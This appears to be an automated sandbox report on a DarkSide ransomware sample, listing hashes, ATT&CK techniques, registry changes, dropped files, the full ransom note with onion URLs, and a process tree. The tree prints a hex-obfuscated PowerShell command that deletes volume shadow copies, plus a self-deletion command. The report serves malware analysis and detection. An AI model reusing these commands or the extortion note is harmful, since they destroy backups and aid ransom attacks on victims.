darkside | c2ee523bb90260218b88e7fe0b7ca0dee8c9042c863682619c542d4961ddb32e

General

Target

LisectAVT_2403002C_159.exe
Size

75KB
MD5

82eab016732be7b8b8aa14f205ca69cf
SHA1

818f451044610b1805e4c515d2bf112718fc8125
SHA256

c2ee523bb90260218b88e7fe0b7ca0dee8c9042c863682619c542d4961ddb32e
SHA512

1b87a7b81c1841e6dff89224f386ff52bd752e124e8c1c68e480ba399446404ad29e92172731fccd93e8a89e61f5097c07c9d6e0f41d2131a96d317344343eea
SSDEEP

1536:Dx7Fu4/i6/P3rlckx5+R4VDZ5CRGCq2iW7z:F7FujwPblhx1DZ5yGCH

Score

10^/10

darkside aspackv2 credential_access defense_evasion discovery execution ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\Admin\README.cc85ebd3.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 90 GB data. These files include: Finance data Insurance data Buchgalting Data Banking data and details, bank contracts, creditors info Much personal data Marketing data Production, Technik data Email conversations dump and more others. All documents are fresh (last 365 days) and stored on our offline servers. All data will be published piece by piece. First data pack will be published in 7 days if we do not come for agreement. Your personal leak page: http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF On the page you will find examples of files that have been stolen. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH When you open our website, put the following data in the input form: Key: rIzr2nCuqbQL7MGMwoppaucqSp5AZufUiYhssYa1SGfO0XFf09fBDlLDWgKQSnnvIAfqYTsOgUhOTxzbxGsC9nH0yk2HOFhn7t8ntX8L0evyce8vKdgUKF7Xvjn6ljaQQ4HPEfPZFP2jvN0DgBVWl2WgNT1U3owZ1bNBjps34t33ObZc01Ce1yKx5CSlwUYbw1ktjqt5d7R9DwRL3NIGrTHvMX3qXI5aBAUnirnc4zHtfGPXq4CuFoh04Tv7VE81aohfvuz8D7wo7i28sbILoJyF6mzeQwSkAXolOhXKQAEPsGcdbfLxfY5uILkHB3d1gAyxT1owQXsY4heNQbY3yYL1Em7dDaLdbNhOf0adYWFiFfAl9EwLDRT96L9Xzsk17ho1B82wOWZ79ZqtT8yqnZ4APJb1LO91ASSsgUdNvR0lAaZTfXHHxUI1vDm5ygyV7cbxMlrQ5K1U6ughdd5WosogMJWVNjreirhzuDzY6SnixtukGYG0D9azzgOHcgidJcLV4n0orhzIaA1SMNYOpdOIadgBehCaHwEyr3hn8CEa6fgpUgK6E95 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF

http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Renames multiple (160) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\zfkiJzV.exe	aspack_v212_v242

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

3440 cmd.exe
Executes dropped EXE 1 IoCs

Processes:

zfkiJzV.exe

pid process

1680 zfkiJzV.exe
Loads dropped DLL 2 IoCs

Processes:

LisectAVT_2403002C_159.exe

pid process

2548 LisectAVT_2403002C_159.exe
2548 LisectAVT_2403002C_159.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2884 powershell.exe
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

pid	process
3440	cmd.exe

pid	process
1680	zfkiJzV.exe

pid	process
2548	LisectAVT_2403002C_159.exe
2548	LisectAVT_2403002C_159.exe

pid	process
2884	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

LisectAVT_2403002C_159.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\cc85ebd3.BMP"	LisectAVT_2403002C_159.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\cc85ebd3.BMP"	LisectAVT_2403002C_159.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

LisectAVT_2403002C_159.exe

pid process

2548 LisectAVT_2403002C_159.exe

pid	process
2548	LisectAVT_2403002C_159.exe

Drops file in Program Files directory 64 IoCs

Processes:

zfkiJzV.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Windows Sidebar\sidebar.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.exe	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler.exe	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\SELFCERT.EXE	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Mozilla Firefox\default-browser-agent.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\xjc.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Windows Journal\Journal.exe	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jre7\bin\rmiregistry.exe	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSOUC.EXE	zfkiJzV.exe
File opened for modification	C:\Program Files\DVD Maker\DVDMaker.exe	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateBroker.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Spades\shvlzm.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jre7\bin\javacpl.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler64.exe	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jre7\bin\servertool.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\java.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jre7\bin\ktab.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Checkers\chkrzm.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaire.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\rmid.exe	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\GROOVEMN.EXE	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\INFOPATH.EXE	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Wordconv.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\GRAPH.EXE	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jre7\bin\pack200.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jre7\bin\unpack200.exe	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OIS.EXE	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\SETLANG.EXE	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jsadebugd.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jre7\bin\orbd.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\ONELEV.EXE	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.EXE	zfkiJzV.exe
File opened for modification	C:\Program Files\Windows Defender\MpCmdRun.exe	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	zfkiJzV.exe
File opened for modification	C:\Program Files\Java\jre7\bin\ssvagent.exe	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PPTICO.EXE	zfkiJzV.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\NAMECONTROLSERVER.EXE	zfkiJzV.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

LisectAVT_2403002C_159.exezfkiJzV.execmd.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LisectAVT_2403002C_159.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zfkiJzV.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies Control Panel 1 IoCs

evasion

Processes:

LisectAVT_2403002C_159.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\WallpaperStyle = "10"	LisectAVT_2403002C_159.exe

Modifies registry class 5 IoCs

Processes:

LisectAVT_2403002C_159.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cc85ebd3	LisectAVT_2403002C_159.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cc85ebd3\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\cc85ebd3.ico"	LisectAVT_2403002C_159.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cc85ebd3	LisectAVT_2403002C_159.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cc85ebd3\ = "cc85ebd3"	LisectAVT_2403002C_159.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cc85ebd3\DefaultIcon	LisectAVT_2403002C_159.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exeLisectAVT_2403002C_159.exe

pid process

2884 powershell.exe
2548 LisectAVT_2403002C_159.exe
2548 LisectAVT_2403002C_159.exe

pid	process
2884	powershell.exe
2548	LisectAVT_2403002C_159.exe
2548	LisectAVT_2403002C_159.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

LisectAVT_2403002C_159.exepowershell.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeSecurityPrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeTakeOwnershipPrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeLoadDriverPrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeSystemProfilePrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeSystemtimePrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeProfSingleProcessPrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeIncBasePriorityPrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeCreatePagefilePrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeBackupPrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeRestorePrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeShutdownPrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeDebugPrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeSystemEnvironmentPrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeRemoteShutdownPrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeUndockPrivilege	2548	LisectAVT_2403002C_159.exe
Token: SeManageVolumePrivilege	2548	LisectAVT_2403002C_159.exe
Token: 33	2548	LisectAVT_2403002C_159.exe
Token: 34	2548	LisectAVT_2403002C_159.exe
Token: 35	2548	LisectAVT_2403002C_159.exe
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeBackupPrivilege	1288	vssvc.exe
Token: SeRestorePrivilege	1288	vssvc.exe
Token: SeAuditPrivilege	1288	vssvc.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

LisectAVT_2403002C_159.exezfkiJzV.exe

description	pid	process	target process
PID 2548 wrote to memory of 1680	2548	LisectAVT_2403002C_159.exe	zfkiJzV.exe
PID 2548 wrote to memory of 1680	2548	LisectAVT_2403002C_159.exe	zfkiJzV.exe
PID 2548 wrote to memory of 1680	2548	LisectAVT_2403002C_159.exe	zfkiJzV.exe
PID 2548 wrote to memory of 1680	2548	LisectAVT_2403002C_159.exe	zfkiJzV.exe
PID 1680 wrote to memory of 2096	1680	zfkiJzV.exe	cmd.exe
PID 1680 wrote to memory of 2096	1680	zfkiJzV.exe	cmd.exe
PID 1680 wrote to memory of 2096	1680	zfkiJzV.exe	cmd.exe
PID 1680 wrote to memory of 2096	1680	zfkiJzV.exe	cmd.exe
PID 2548 wrote to memory of 2884	2548	LisectAVT_2403002C_159.exe	powershell.exe
PID 2548 wrote to memory of 2884	2548	LisectAVT_2403002C_159.exe	powershell.exe
PID 2548 wrote to memory of 2884	2548	LisectAVT_2403002C_159.exe	powershell.exe
PID 2548 wrote to memory of 2884	2548	LisectAVT_2403002C_159.exe	powershell.exe
PID 2548 wrote to memory of 3440	2548	LisectAVT_2403002C_159.exe	cmd.exe
PID 2548 wrote to memory of 3440	2548	LisectAVT_2403002C_159.exe	cmd.exe
PID 2548 wrote to memory of 3440	2548	LisectAVT_2403002C_159.exe	cmd.exe
PID 2548 wrote to memory of 3440	2548	LisectAVT_2403002C_159.exe	cmd.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002C_159.exe
"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002C_159.exe"
1⤵
- Loads dropped DLL
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548
- C:\Users\Admin\AppData\Local\Temp\zfkiJzV.exe
  C:\Users\Admin\AppData\Local\Temp\zfkiJzV.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\1cfb52cc.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2884
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\LISECT~1.EXE >> NUL
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  PID:3440

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

1

T1070

File Deletion

Modify Registry

Credential Access

Credentials from Password Stores

2

T1555

Credentials from Web Browsers

1

T1555.003

Windows Credential Manager

1

T1555.004

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Browser Information Discovery

1

T1217

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1VX38S3F\k2[1].rar

Filesize
4B

MD5
d3b07384d113edec49eaa6238ad5ff00

SHA1
f1d2d2f924e986ac86fdf7b36c94bcdf32beec15

SHA256
b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c

SHA512
0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\07EE5F39.exe

Filesize
4B

MD5
20879c987e2f9a916e578386d499f629

SHA1
c7b33ddcc42361fdb847036fc07e880b81935d5d

SHA256
9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31

SHA512
bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1cfb52cc.bat

Filesize
189B

MD5
233054bcc24a8b60520018df6995c0b6

SHA1
e2d57927bf4cd1dfe32db8ae97dd1522fc34ef76

SHA256
64af832ccf75b452a140cb614a9adacf648a4c9cb41708772b980e72c0d322da

SHA512
ed141d36130f2c9af0472aa0c702ed4447495b6c178078138c9bca9c11581800280ed5f7bfd113692ba5f339f4560683d005e5a5857bdf28d48d3ab7b1cc41a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\zfkiJzV.exe

Filesize
15KB

MD5
f7d21de5c4e81341eccd280c11ddcc9a

SHA1
d4e9ef10d7685d491583c6fa93ae5d9105d815bd

SHA256
4485df22c627fa0bb899d79aa6ff29bc5be1dbc3caa2b7a490809338d54b7794

SHA512
e4553b86b083996038bacfb979ad0b86f578f95185d8efac34a77f6cc73e491d4f70e1449bbc9eb1d62f430800c1574101b270e1cb0eeed43a83049a79b636a3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
12cfb791d697af200bec3f94f3588c2c

SHA1
9b8a6b3c1cbc37c980eaa1249025218dfefe156b

SHA256
a37590728d471e8a553b69e054ecbcaca5f3f25c6909a45eaf2d7b2d7f03a5e1

SHA512
a1971f2e9b2d348ff9dba0acb6e02a8206f69f2cc3d395ad16ddfa51b138b552c46abc1df70300d0a40b79285cddf81342fd0f0784aca0831c4201f9ae2a5a94

Download Submit
C:\Users\Admin\README.cc85ebd3.TXT

Filesize
3KB

MD5
b58e2411168bbdbec635cf4001635db0

SHA1
c130cd9caaaa514a6b98c1168e10d44a989d191a

SHA256
652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a

SHA512
87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a

Download Submit
memory/1680-55-0x00000000000D0000-0x00000000000D9000-memory.dmp

Filesize
36KB

Download
memory/1680-11-0x00000000000D0000-0x00000000000D9000-memory.dmp

Filesize
36KB

Download
memory/2548-10-0x0000000000020000-0x0000000000029000-memory.dmp

Filesize
36KB

Download
memory/2548-9-0x0000000000020000-0x0000000000029000-memory.dmp

Filesize
36KB

Download
memory/2548-1-0x0000000000E20000-0x0000000000E39000-memory.dmp

Filesize
100KB

Download
memory/2548-273-0x0000000000E20000-0x0000000000E39000-memory.dmp

Filesize
100KB

Download
memory/2548-278-0x0000000000E20000-0x0000000000E39000-memory.dmp

Filesize
100KB

Download
memory/2884-61-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/2884-62-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads